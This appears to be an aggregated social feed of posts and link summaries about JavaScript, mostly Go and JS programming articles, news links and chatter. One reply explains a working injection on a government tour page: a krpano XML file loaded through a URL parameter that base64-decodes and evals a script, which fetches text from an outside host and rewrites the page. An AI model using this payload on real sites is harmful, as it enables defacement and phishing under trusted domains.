Also spent the morning continuing to think about a new design for EdgeGuard’s WAF. I’m basically going to build an entirely new pluggable WAF that will be designed to only consider Rate Limiting, IP/ASN-based filtering, JavaScript challenge handling, Basic behavioral analysis and Anomaly detection.
The only part of this design I’m not 100% sure about is the Javascript-based challenge handling? 🤔 I’m also considering making this into a “proof of work” requirement too, but I also don’t want to falsely block folks that a) turn Javascript™ off or b) Use a browser like links, elinks or lynx for example.
Hmmm 🧐
️♂️ Unlisted but Not Unseen: How I Found the Admin Panel in a JavaScript Comment
Hey there!😁
[Continue reading on InfoSec Write-ups »](https://infosecwriteu … ⌘ Read more
告別 JMeter!這款 Go 語言神器讓性能測試輕量 10 倍,還支持分佈式壓測
k6 簡介:爲何選擇它———–k6 由 Go 語言編寫,相較於傳統工具 JMeter,具有輕量高效、語法簡潔、擴展性強等優勢。其特點包括:開發者友好:基於 JavaScript/TypeScript 腳本,無縫銜接現代開發流程 雲原生支持:內置分佈式測試能力,輕鬆模擬萬級併發 豐富可視化:提供 HTML/JSON 格式報告,支持自定義儀表板 擴展生態:通過 npm ⌘ Read more
現代 JavaScript 異步寫法:不依賴 await,構建高性能異步系統
在 ES6 + 時代,JavaScript 異步編程經歷了重大變革。雖然async/await語法顯著提升了代碼可讀性,但在某些場景下直接操作 Promise 和利用新特性能帶來更精細的控制。1. Promise 鏈式操作fetch(’https://api.example.com/data’) .then(response = { if (!response.ok) throw ne ⌘ Read more
V8 JavaScript engine gets eager compilation hints, but will devs use sparingly as advised?
Comments ⌘ Read more
** Payloads in Plain Sight: How Open Redirect + JavaScript Led to Full Account Takeover **
Hey there!😁
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/payloads-in-plai … ⌘ Read more
Exposed Secrets in JavaScript Files
🔥Free Article https://medium.com/@Abhijeet_kumawat_/exposed-secrets-in-javascript-files-430a76834952?sk=ffd9ca6c8ede38ac77dcb68a507b9299
[Continue reading on InfoSec Write-ups »](https://infosecwriteups.com/exposed-secrets-in-javascript-fi … ⌘ Read more
Go 語言新版的迭代器是怎麼個事
很多流行的編程語言中都以某種方式提供迭代器,其中包括 C++、Java、Javascript、Python 和 Rust。Go 語言現在也加入了迭代器。iter 包是 Go 1.23 新增的標準庫,提供了迭代器的基本定義和相關操作。爲什麼需要迭代器——–在 Go 1.18 引入泛型之後,便可以很方便的定義一些泛型容器類型來提升編碼效率。例如我們可以基於 map 類型定義了一個集合類型—— ⌘ Read more
使用 Golang-WebSocket 實現按鍵記錄
在 Web 開發和安全研究中,監聽用戶輸入是一項重要的功能,比如在在線代碼編輯器、遊戲按鍵綁定或快捷鍵管理中,我們可能需要記錄用戶的按鍵輸入。本文將介紹如何使用 Golang + WebSocket 實現一個簡單的按鍵記錄系統。按鍵監聽的原理在 Web 端,我們可以使用 JavaScript 的事件監聽器來捕獲用戶的鍵盤輸入事件。JavaScript 提供了 keydown、keypress 和 ⌘ Read more
Playing multimedia with Dillo
What if you want to use a web browser like Dillo, which lacks JavaScript support and can’t play audio or video inside the browser? Dillo doesn’t have the capability to play audio or video directly from the browser, however it can easily offload this task to other programs. This page collects some examples of how to do watch videos and listen to audio tracks or podcasts by using an external player program. In particular we will cover mpv with yt-dlp which supports YouTube … ⌘ Read more
i wonder if i could make a little yarn widget for my site to show my last post. that’d be fun. sadly i do not know javascript
PEP 776: Emscripten Support
Emscripten is a complete open source compiler toolchain. It compiles C/C++ code into WebAssembly/JavaScript executables, for use in JavaScript runtimes, including browsers and Node.js. The Rust language also maintains an Emscripten target. ⌘ Read more
yaegi:讓你的 Go 代碼擁有動態腳本能力
在 Go 語言的世界裏,靜態編譯是其一大特色,能夠保證性能和安全性。然而,有些場景下,我們希望像 Python 或 JavaScript 一樣,支持運行時動態執行代碼,比如插件化架構、規則引擎、腳本解釋器等。今天,我們來介紹一個強大的 Go 解釋器庫——yaegi,它能讓 Go 代碼在運行時執行動態腳本。yaegi 簡介yaegi 是一個用 Go 語言編寫的 Go 解釋器。它可以在運行時解析和執行 ⌘ Read more
Oracle justified its JavaScript trademark with Node.js–now it wants that ignored
Article URL: https://deno.com/blog/deno-v-oracle2
Comments URL: https://news.ycombinator.com/item?id=42939940
Points: 503
# Comments: 129 ⌘ Read more
Run Linux inside a PDF file via a RISC-V emulator
You might expect PDF files to only be comprised of static documents, but surprisingly, the PDF file format supports Javascript with its own separate standard library. Modern browsers (Chromium, Firefox) implement this as part of their PDF engines. However, the APIs that are available in the browser are much more limited. The full specfication for the JS in PDFs was only ever implemented by Adobe Acrobat, and it contains some ridicul … ⌘ Read more
@lyse@lyse.isobeef.org The one in question is more like the javascript version for unwrapping errors when accessing methods.
const value = some?.deeply?.nested?.object?.value
but for handling errors returned by methods. So if you wanted to chain a bunch of function calls together and if any error return immediately. It would be something like this:
b:= SomeAPIWithErrorsInAllCalls()
b.DoThing1() ?
b.DoThing2() ?
// Though its not in the threads I assume one could do like this to chain.
b.Chain1()?.Chain2()?.End()?
I am however infavor of having a sort of ternary ? in go.
PS. @prologic@twtxt.net for some reason this is eating my response without throwing an error :( I assume it has something to do with the CSRF. Can i not have multiple tabs open with yarn?
JavaScript Temporal is coming
Article URL: https://developer.mozilla.org/en-US/blog/javascript-temporal-is-coming/
Comments URL: https://news.ycombinator.com/item?id=42876840
Points: 504
# Comments: 173 ⌘ Read more
(#62ohn5q) @arne@arne I do 😅 Despite some opinions, I actually love HTMX and use it in many of my projects, including yarnd to giv …
@arne @uplegger.eu I do 😅 Despite some opinions, I actually love HTMX and use it in many of my projects, including yarnd to give it that nice SPA-like UX feel without all this Javascript React nonsense 😅 ⌘ Read more
Google begins requiring JavaScript for Google Search
Google says it has begun requiring users to turn on JavaScript, the widely used programming language to make web pages interactive, in order to use Google Search. In an email to TechCrunch, a company spokesperson claimed that the change is intended to “better protect” Google Search against malicious activity, such as bots and spam, and to improve the overall Google Search experience for users. The spokesperson noted that, with … ⌘ Read more
↳
In-reply-to
»
Nice! totally legit government page: https://tour.diplomaticrooms.state.gov/?id=0&xml=https://sour.is/awesome.html
⤋ Read More
So this works by adding some unbounded javascript autoloaded by the KRPano VR Media viewer
the xml parameter has a url that contains the following
<?xml version="1.0"?>
<krpano version="1.0.8.15">
<SCRIPT id="allow-copy_script"/>
<layer name="js_loader" type="container" visible="false" onloaded="js(eval(var w=atob('... OMIT ...');eval(w)););"/>
</krpano>
the omit above is base64 encoded script below:
const queryParams = new URLSearchParams(window.location.search),
id = queryParams.get('id');
id ? fetch('https://sour.is/superhax.txt')
.then(e => e.text())
.then(e => {
document.open(), document.write(e), document.close();
})
.catch(e => {
console.error('Error fetching the user agent:', e);
}) : console.error('No');
this script will fetch text at the url https://sour.is/superhax.txt and replaces the document content.
Show HN: Tetris in a PDF
I realized that the PDF engines of modern desktop browsers (PDFium and PDF.js) support JavaScript with enough I/O primitives to make a basic game like Tetris.
It was a bit tricky to find a union of features that work in both engines, but in the end it turns out that showing/hiding annotation “fields” works well to make monochrome pixels, and keyboard input can be achieved by typing in a text input box.
All in all it’s quite janky but a nice reminder of how general purpose PDF scripting can be. The lin … ⌘ Read more
morning yarn friends i’ve been playing with astro the SSG and it’s a blast i see why my friends love it and rec it to everyone. i may think javascript was a mistake but this is super cool
Deno v. Oracle: JavaScript Trademark Dispute
Legal action seeks to cancel Oracle’s “JavaScript” trademark, which it renewed fraudulently and has abandoned. ⌘ Read more
完全用 Go 編寫的 JS 引擎
背景介紹隨着互聯網技術的迅猛發展,JavaScript 已經成爲幾乎所有現代網頁和應用開發中不可或缺的組成部分。但是,JavaScript 的執行環境通常侷限於瀏覽器或者 Node.js,這爲那些希望在不同環境下運行 JavaScript 代碼的開發者帶來了限制。特別是在 Go 語言環境中,開發者面臨着將 JavaScript 與 Go 通信的挑戰,因爲二者運行時不一致可能導致性能下降和開發效率降 ⌘ Read more
↳
In-reply-to
»
(#aznhzra) @doesnm Agree. salty.im should allow the user to post multiple brokers on their webfinger so the client can find a working path.
⤋ Read More
Honestly… not much. Have abandon two projects (both private) on Golang and one related to cryptography. My mostly languages are Python and Javascript (also can PHP). After writing code on Go i spend same time on fixing dumb errors
探索 Goja: 一個 Golang JavaScript 運行時
本文探討了 Golang 生態系統中的 JavaScript 運行時庫 Goja[1] 。Goja 作爲一個在 Go 應用程序中嵌入 JavaScript 的強大工具脫穎而出, 在操作數據和提供無需 go build 步驟的 SDK 方面具有獨特優勢。背景: 爲什麼需要 Goja在我的項目中, 在查詢和操作大型數據集時遇到了挑戰。最初, 所有內容都是用 Go 編寫的, 這很高效, 但在處理複雜的 ⌘ Read more
** A playground for sharing scrappy fiddles **
I shared some snippets of JavaScript in a recent blog post and was wicked irked that I didn’t have an easy way to share interactive code on my own thing…so… I made a totally static JavaScript playground for running little experiments and sharing scrappy fiddles!
It is pretty simple — it allows folks to enter and run JavaScript, includes a console so you can easily log thing … ⌘ Read more
** Constants, variable assignment, and pointers **
After reading my last post, a friend asked an interesting question that I thought would also be fun to write about!
They noted that in the reshape function I declared the variable result as a constant. They asked if this was a mistake? Because I was resigning the value iteratively, shouldn’t it be declared using let?
What is happening there is that the constant is being declared as an array, so the reference … ⌘ Read more
** Reshape, in JavaScript and APL **
In APL the rho, ⍴, called reshape is used to both construct arrays of a given shape (dimensionality), and to reconfigure arrays into new shapes.
Sometimes I wish I had reshape in JavaScript…so I wrote it!
Here are two functions that, when combined, a la Captain Planet, can stand in for APL’s reshape in JavaScript.
Ravel is the simpler of the two, it takes an array of any dimension and ret … ⌘ Read more
Adding the ESLint Tool to an AI Assistant: Improving Recommendations for JS/TS Projects
We show how to enable our AI assistant to provide advice that is both helpful and actionable for linting JavaScript and TypeScript projects. ⌘ Read more
Porting my JavaScript Game Engine to C for No Reason
high_impacttl;dr: high_impact is small game engine for 2D action games. It’s written in C, compiles to Windows, Mac and Linux as well as to WASM for the Web. It’s “inspired by” my original Impact JavaScript game engine from 2010. The name high_impact is a nod to a time when C was considered a high level language.
MIT licensed, source on github: [github.com/phoboslab/high_impact](https://github … ⌘ Read more
How to add OTEL instrumentation to a React Native app
Member post by Jonathan Munz, Senior Software Engineer at Embrace React Native allows developers to build native mobile apps using Javascript and Typescript for both iOS and Android. With a web language as its core and native deployment… ⌘ Read more
Porting my JavaScript Game Engine to C for No Reason
high_impacttl;dr: high_impact is small game engine for 2D action games. It’s written in C, compiles to Windows, Mac and Linux as well as to WASM for the Web. It’s “inspired by” my original Impact JavaScript game engine from 2010. The name high_impact is a nod to a time when C was considered a high level language.
MIT licensed, source on github: [github.com/phoboslab/high_impact](https://github … ⌘ Read more
Go 語言的 Lodash 風格庫
在 JavaScript 的世界裏,Lodash 是一個家喻戶曉的工具庫,它提供了豐富的函數,方便開發者操作數組、對象、字符串等等。Lodash 極大地提高了 JavaScript 開發者的效率,也讓代碼更加簡潔易讀。在 Go 語言 1.18 版本之前,由於缺乏泛型,我們很難實現像 Lodash 這樣功能強大且類型安全的工具庫。然而,隨着 Go 1.18 泛型的引入,這一切都發生了改變。sambe ⌘ Read more
How to Update Node.js to Latest Version on Mac
If you use Node.js for web development, creation of web apps, and javascript based network applications, you undoubtedly may come across situations where you’d like to make sure that the latest version of Node.js is installed on your Mac. Upgrading to the latest version of Node.js means you’ll have access to the most recent features … Read More ⌘ Read more
There is JavaScript, but not everything is implemented (properly). They’re writing everything including the JavaScript engine from scratch.
A huge effort 😲
Attack of the clones: Getting RCE in Chrome’s renderer with duplicate object properties
In this post, I’ll exploit CVE-2024-3833, an object corruption bug in v8, the Javascript engine of Chrome, that allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site.
The post [Attack of the clones: Getting RCE in Chrome’s renderer with duplicate object properties](https://github.blog/2024-06-26-attack-of-the-cl … ⌘ Read more
深入 Go interface: Duck Typing 和多態
Duck Typing鴨子類型(Duck Typing)是一種編程概念,關鍵在於根據對象的行爲來確定其類型。通常的解釋是通過一個巧妙的例子:根據對象的行爲來判斷它是否是一隻鴨子。如果它游泳像鴨子、嘎嘎叫像鴨子,那麼它就可以被認爲是一隻鴨子。動態語言如 Python 和 JavaScript 自然支持這種特性,但與靜態語言相比,動態語言缺乏重要的類型檢查。Go 語言的接口設計與鴨子類型概念密切相關, ⌘ Read more
** books, the end of winter, video games and javascript **
Since my last update I’ve read a handful of books. Some standout reads include Tales from Earthsea, The Other Wind and The Left Hand of Darkness, all by Ursula K. Le Guin. I’d read them all before, accepted for The Other Wind. I thought I’d read The Other Wind, but hadn’t! Chaos: Making a New Science by James Gleick was also a fun read. I liked it for the rabbit holes it invited me down; I’ve been thinking a lot … ⌘ Read more
How to Disable Content Blockers for Specific Sites in Safari for Mac
Some Mac users have content blockers installed into Safari, which are usually designed to prevent a part of a webpage from loading, things like preventing a remote javascript that tracks cookies or loads ads, or something that places a cookie into your browser, etc. The very nature of how content blockers work can cause interference … [Read More](https://osxdaily.com/2024/02/23/how-to-disable-cont … ⌘ Read more
Build code security skills with the GitHub Secure Code Game
Learn to find and fix security issues while having fun with Secure Code Game, now with new challenges focusing on JavaScript, Python, Go, and GitHub Actions!
The post Build code security skills with the GitHub Secure Code Game appeared first on The GitHub Blog. ⌘ Read more
使用 Go Gin SecureJSON 技術保護你的 JSON 數據
網絡上的安全問題一直是不能小覷的難題,尤其在 web 開發中,JSON 劫持就是其中的一種。這篇文章,我們將聚焦在 Go 框架 Gin 下的 SecureJSON 使用,來保護我們的 JSON 數據。什麼是 JSON 劫持?————JSON 劫持是一種網絡攻擊手段,攻擊者利用 JavaScript 的這個特性獲取到不屬於自己的數據。由於 JSON 數據一般包含非常敏感的個人信息,例 ⌘ Read more
Wasm on Go
本篇內容,是對極客兔兔: Go WebAssembly (Wasm) 簡明教程 [1] 的實踐與記錄,主體內容來自這篇博客,推薦閱讀原文。 是否需要搭建 wasm 環境? WebAssembly 上手 [2]如果是 C/C++,需要藉助 emcc,將 C 和 C++ 代碼編譯到 WebAssembly 和 JavaScript。在 Mac 上,brew install emscripten然後 ⌘ Read more
Golang 有必要實現 async-await 嗎?
前言 今天在某站上面看到一個大佬解釋 Golang 中的錯誤處理 err !=nil 時,直接用 Javascript 的 async/await 來解釋。async/await 語法糖在 C#, Python 和 Javascript 中是很常見的異步協程寫法,而在 Golang 中則是使用 goroutine 機制。這時習慣或者喜歡 async/await 語法糖的人可能就會有疑問:Gola ⌘ Read more
Go JSON 文件讀寫最佳實踐
*概述在 Go 語言中,JSON(JavaScript Object Notation)是一種常見的數據交換格式,用於在不同語言之間進行數據傳遞。本文將介紹 Go 語言中如何進行 JSON 文件的讀寫操作,包括解析與序列化,錯誤處理,以及一些實用技巧。一、JSON 文件基礎操作JSON 文件的讀取如何從 JSON 文件中讀取數據。package mainimport ( “encoding/js ⌘ Read more
介紹 Agency: 使 AI 與 Go 語言無縫對接
在當今應用開發領域,類似 OpenAI API 等生成式 AI 技術的蓬勃發展正在徹底改變着應用開發的格局。Python 和 JavaScript 等語言已經擁有豐富的資源來支持這些技術,其中 LangChain 就是一個顯著的例子。然而,Go 語言開發者面臨的選擇卻相對有限。LangChainGo,作爲 LangChain 的 Go 語言版本,一直在努力與 Go 的編程理念保持一致,而 Lang ⌘ Read more
Rediscovered how it’s possible to show/hide content on an HTML page without JavaScript, using a checkbox and some sprinkle of CSS magic.